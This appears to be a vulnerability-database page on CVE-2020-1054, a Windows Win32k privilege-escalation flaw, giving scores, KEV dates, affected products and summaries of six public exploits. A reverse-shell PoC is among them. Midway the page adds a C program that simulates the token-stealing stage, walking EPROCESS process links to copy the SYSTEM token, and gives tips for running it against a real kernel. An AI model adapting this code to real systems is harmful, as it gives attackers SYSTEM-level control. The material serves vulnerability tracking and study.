CVE-2020-1054

HIGH KEV

Windows - Local Privilege Escalation via Win32k Driver Memory Handling

Title source: llm

Exploitation Summary

CVE-2020-1054 is actively exploited and was added to the CISA Known Exploited Vulnerabilities (KEV) catalog on November 3, 2021. EIP tracks 6 public exploits, including PoCs by 0xeb-bp, KaLendsi and Iamgublin and the Metasploit module exploits/windows/local/cve_2020_1054_drawiconex_lpe.

AI-analyzed exploit summary (top-ranked entry, 0xeb-bp's PoC): This is a Rust-based local privilege escalation (LPE) exploit for CVE-2020-1054, targeting Windows 7 x64. It leverages a GDI object manipulation vulnerability to achieve arbitrary kernel memory writes and escalate privileges.

Description

An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1143.

Exploits (6)

nomisec WORKING POC 85 stars
by 0xeb-bp · local
https://github.com/0xeb-bp/cve-2020-1054

This is a Rust-based local privilege escalation (LPE) exploit for CVE-2020-1054, targeting Windows 7 x64. It leverages a GDI object manipulation vulnerability to achieve arbitrary kernel memory writes and escalate privileges.

Classification: Working PoC (95%) · Attack type: LPE · Complexity: Complex · Reliability: Reliable
Target: Windows 7 x64 (pre-KB patch)
Auth: none needed
Prerequisites: Windows 7 x64 system without the specific KB patch · Local access to the target system
Analyzed by devstral-2, Feb 16, 2026
nomisec WORKING POC 20 stars
by KaLendsi · local
https://github.com/KaLendsi/CVE-2020-1054

This exploit leverages CVE-2020-1054, a Windows GDI privilege escalation vulnerability, by manipulating bitmap objects and using HMValidateHandle (the well-known win32k technique for leaking the kernel address of a user-mode handle's object) to reach arbitrary code execution in the context of the SYSTEM user. The PoC includes shellcode injection and command execution via a reverse shell.

Classification: Working PoC (95%) · Attack type: LPE · Complexity: Complex · Reliability: Reliable
Target: Windows 10 (and possibly other versions) with GDI component
Auth: none needed
Prerequisites: Local access to a vulnerable Windows system · Ability to execute arbitrary code on the target
Analyzed by devstral-2, Feb 16, 2026
nomisec WORKING POC 4 stars
by Iamgublin · poc
https://github.com/Iamgublin/CVE-2020-1054

This is a working proof-of-concept exploit for CVE-2020-1054, a Windows local privilege escalation vulnerability in the win32k.sys driver. The exploit leverages a bitmap memory corruption issue to achieve arbitrary read/write in kernel memory, ultimately replacing the current process token with the SYSTEM token.

Classification: Working PoC (95%) · Attack type: LPE · Complexity: Complex · Reliability: Reliable
Target: Microsoft Windows (win32k.sys)
Auth: required
Prerequisites: Local access to a vulnerable Windows system · Ability to execute arbitrary code
Analyzed by devstral-2, Feb 16, 2026
nomisec WORKING POC
by Graham382 · local
https://github.com/Graham382/CVE-2020-1054

This is a working proof-of-concept exploit for CVE-2020-1054, a Windows local privilege escalation vulnerability. It leverages a GDI object manipulation flaw to overwrite kernel memory and escalate privileges to SYSTEM by replacing the current process token with the SYSTEM token.

Classification: Working PoC (95%) · Attack type: LPE · Complexity: Complex · Reliability: Reliable
Target: Windows 7 (likely other versions as well)
Auth: required
Prerequisites: Local access to a vulnerable Windows system · Ability to execute arbitrary code
Analyzed by devstral-2, Feb 16, 2026
metasploit WORKING POC NORMAL
by Netanel Ben-Simon, Yoav Alon, bee13oy, timwr · ruby · poc · win
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/cve_2020_1054_drawiconex_lpe.rb

This Metasploit module exploits CVE-2020-1054, an out-of-bounds write vulnerability in the DrawIconEx function within win32k.sys, allowing local privilege escalation to SYSTEM on Windows 7 x64 SP1. It leverages controlled out-of-bounds kernel memory writes to achieve arbitrary code execution.

Classification: Working PoC (100%) · Attack type: LPE · Complexity: Complex · Reliability: Racy
Target: Microsoft Windows 7 x64 SP1 (win32k.sys)
Auth: none needed
Prerequisites: Local access to a vulnerable Windows 7 x64 SP1 system · Meterpreter session
Analyzed by devstral-2, Feb 19, 2026
patchapalooza WRITEUP
by Ascotbe · local
https://github.com/Ascotbe/Kernelhub

This repository contains documentation and metadata-generation scripts for a collection of Windows kernel exploits, including CVE-2003-0352, CVE-2006-3439 and others. It does not include functional exploit code but provides structured documentation and configuration tools for organizing exploit information.

Classification: Writeup (90%) · Attack type: Other · Complexity: Moderate · Reliability: Theoretical
Target: Windows Kernel (various versions)
Auth: none needed
Prerequisites: Access to the repository · Python environment for script execution
Analyzed by devstral-2, Feb 23, 2026
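The Iamgublin and Graham382 entries above both end the same way: once the DrawIconEx out-of-bounds write has been turned into an arbitrary kernel read/write primitive (the bitmap-object technique the entries describe), the exploit walks the kernel's process list and copies the SYSTEM token pointer into its own EPROCESS. The following is an added example written for this page, not code from any of the PoCs or the Metasploit module. It implements that final token-stealing stage against an abstract read/write interface and backs that interface with a constructed in-process buffer standing in for kernel memory, so it compiles and runs on any host. The EPROCESS offsets, the fake kernel base KBASE, the PIDs and the token values are all hypothetical; on a real target the offsets come from the build's ntoskrnl symbols and the primitive comes from the corrupted bitmap.

```c
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical EPROCESS field offsets, constructed for this simulation.
 * Real offsets of UniqueProcessId, ActiveProcessLinks and Token differ per
 * Windows build and must be taken from the target's ntoskrnl symbols. */
#define OFF_UNIQUE_PID    0x00
#define OFF_ACTIVE_LINKS  0x08   /* LIST_ENTRY: Flink at +0, Blink at +8 */
#define OFF_TOKEN         0x18   /* _EX_FAST_REF: pointer | 4-bit refcount on x64 */

#define KBASE     0xFFFFF80000000000ULL  /* fake kernel base so addresses look real */
#define KMEM_SIZE 0x1000
static uint8_t g_kmem[KMEM_SIZE];        /* constructed stand-in for kernel memory */

/* Interface of the arbitrary read/write primitive. In the PoCs this is backed
 * by a GDI bitmap whose pixel pointer was corrupted through the DrawIconEx
 * out-of-bounds write; here it is backed by g_kmem. */
typedef uint64_t (*kread_fn)(uint64_t kaddr);
typedef void     (*kwrite_fn)(uint64_t kaddr, uint64_t value);

static void check_range(uint64_t kaddr) {
    if (kaddr < KBASE || kaddr - KBASE + sizeof(uint64_t) > KMEM_SIZE) {
        fprintf(stderr, "access outside simulated kernel memory: 0x%" PRIx64 "\n", kaddr);
        abort();
    }
}
static uint64_t sim_read(uint64_t kaddr) {
    uint64_t v;
    check_range(kaddr);
    memcpy(&v, g_kmem + (kaddr - KBASE), sizeof v);
    return v;
}
static void sim_write(uint64_t kaddr, uint64_t value) {
    check_range(kaddr);
    memcpy(g_kmem + (kaddr - KBASE), &value, sizeof value);
}

/* Walk EPROCESS.ActiveProcessLinks from a known EPROCESS (PsInitialSystemProcess
 * in a real exploit) until UniqueProcessId == pid. The walk is bounded so a
 * corrupted list cannot spin forever; returns 0 if pid is not found. */
static uint64_t find_eprocess(kread_fn rd, uint64_t start, uint64_t pid) {
    uint64_t cur = start;
    for (int i = 0; i < 4096; i++) {
        if (rd(cur + OFF_UNIQUE_PID) == pid)
            return cur;
        /* Flink points at the next entry's LIST_ENTRY; step back to its EPROCESS */
        cur = rd(cur + OFF_ACTIVE_LINKS) - OFF_ACTIVE_LINKS;
        if (cur == start)
            break;
    }
    return 0;
}

/* Copy the SYSTEM (PID 4) token pointer into the target process's Token field.
 * The low 4 bits of _EX_FAST_REF are the fast reference count; the target's
 * own bits are kept so the pointer bits alone are replaced. */
static int steal_token(kread_fn rd, kwrite_fn wr, uint64_t start, uint64_t target_pid) {
    uint64_t sys_eproc = find_eprocess(rd, start, 4);
    uint64_t tgt_eproc = find_eprocess(rd, start, target_pid);
    if (!sys_eproc || !tgt_eproc)
        return -1;
    uint64_t sys_tok = rd(sys_eproc + OFF_TOKEN);
    uint64_t tgt_tok = rd(tgt_eproc + OFF_TOKEN);
    wr(tgt_eproc + OFF_TOKEN, (sys_tok & ~0xFULL) | (tgt_tok & 0xFULL));
    return 0;
}

/* Constructed process list: System (PID 4), one service, and our process,
 * linked circularly through ActiveProcessLinks. Returns System's EPROCESS. */
static uint64_t build_fake_process_list(uint64_t our_pid) {
    const uint64_t eproc[3]  = { KBASE + 0x100, KBASE + 0x200, KBASE + 0x300 };
    const uint64_t pids[3]   = { 4, 612, our_pid };
    const uint64_t tokens[3] = { 0xFFFFF8A000100000ULL | 0x3,   /* SYSTEM token, refcount 3 */
                                 0xFFFFF8A000200000ULL | 0x1,
                                 0xFFFFF8A000300000ULL | 0x7 }; /* our token, refcount 7 */
    memset(g_kmem, 0, sizeof g_kmem);
    for (int i = 0; i < 3; i++) {
        uint64_t next = eproc[(i + 1) % 3], prev = eproc[(i + 2) % 3];
        sim_write(eproc[i] + OFF_UNIQUE_PID, pids[i]);
        sim_write(eproc[i] + OFF_ACTIVE_LINKS, next + OFF_ACTIVE_LINKS);     /* Flink */
        sim_write(eproc[i] + OFF_ACTIVE_LINKS + 8, prev + OFF_ACTIVE_LINKS); /* Blink */
        sim_write(eproc[i] + OFF_TOKEN, tokens[i]);
    }
    return eproc[0];
}

int main(void) {
    const uint64_t our_pid = 1337;
    uint64_t start = build_fake_process_list(our_pid);
    uint64_t me = find_eprocess(sim_read, start, our_pid);
    printf("token before: 0x%" PRIx64 "\n", sim_read(me + OFF_TOKEN));
    if (steal_token(sim_read, sim_write, start, our_pid) != 0)
        return 1;
    printf("token after:  0x%" PRIx64 "\n", sim_read(me + OFF_TOKEN));
    return 0;
}
```

Two details matter when this runs against a real kernel rather than the simulated buffer. The list walk must be bounded (here 4096 hops) because one bad read of Flink otherwise turns into an infinite loop under the kernel's arbitrary-read primitive, and every read or write has to stay inside memory the primitive is known to reach; the check_range guard in the simulation stands in for that discipline. Preserving the low refcount bits is a choice, not a requirement: several public PoCs copy the whole _EX_FAST_REF value, which works but hands SYSTEM's token a reference count that belongs to the stolen process's old token.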

Scores

CVSS v3.1: 7.8 (HIGH)
CVSS vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack vector: LOCAL
EPSS: 0.8121
EPSS percentile: 99.2%

CISA SSVC (Vulnrichment)

Exploitation: active · Automatable: no · Technical impact: total

Details

CISA KEV: 2021-11-03
VulnCheck KEV: 2020-10-19
InTheWild.io: 2021-07-23
ENISA EUVD: EUVD-2020-11947
CWE: CWE-787 (Out-of-bounds Write)
Status: published
Products (19)
microsoft/windows_10_1507 (2 CPE variants)
microsoft/windows_10_1607 (2 CPE variants)
microsoft/windows_10_1709 (3 CPE variants)
microsoft/windows_10_1803 (3 CPE variants)
microsoft/windows_10_1809 (3 CPE variants)
microsoft/windows_10_1903 (3 CPE variants)
microsoft/windows_10_1909 (3 CPE variants)
microsoft/windows_7
microsoft/windows_8.1
microsoft/windows_rt_8.1
... and 9 more
Published May 21, 2020
KEV Added Nov 03, 2021
Tracked Since Feb 18, 2026